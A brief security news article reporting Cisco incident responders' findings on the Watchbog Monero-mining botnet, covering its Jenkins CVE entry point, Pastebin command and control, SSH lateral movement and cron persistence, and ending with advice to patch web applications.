Security experts have uncovered an incident that involved the Watchbog cryptomining botnet. Attackers exploited CVE-2018-1000861 to establish a foothold on the victim’s network and install Watchbog malware on unpatched systems.
The Cisco Incident Response (CSIRS) responded to the incident and found the Linux-based malware. Watchbog is primarily used to mine Monero cryptocurrency by its owners.
The group soon found the malware relied on Pastebin for command and control (C2) operations. In addition, the attackers also used base64 encoding URLs and Pastebin for obfuscation.
“The attack was still relatively simple to uncover – this attacker did not practice particularly strong operational security,” the CSIRS noted in the blog post.
Spreading laterally
CSIRS also discovered the attackers used SSH to spread laterally. In addition, the adversaries leveraged a Python script to scan for open Jenkins and Redis ports on other systems hosted on the same subnet.
The attackers used the Python script to target CVE-2018-1000861 a vulnerability in the Stapler web framework for HTTP request handling. If exploited, it could lead to code execution through crafted URLs.
Using persistence
Also, Watchbog used cron jobs to establish persistence on the targeted systems. For example, the jobs leverage a ‘kerberods’ installation script to have the dropper call out to Pastebins once per hour to get new information.
Another researcher, Renato Marinho from Morphus Labs, also added more information on how the malware achieves persistence.
“If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc’s behavior.”
In conclusion, it is critical for organizations to patch web applications. Unpatched systems are easy targets for attackers since they can use those vulnerabilities to gain a foothold on your network. As a consequence, attackers can spread laterally and even use your compromised systems for future botnets.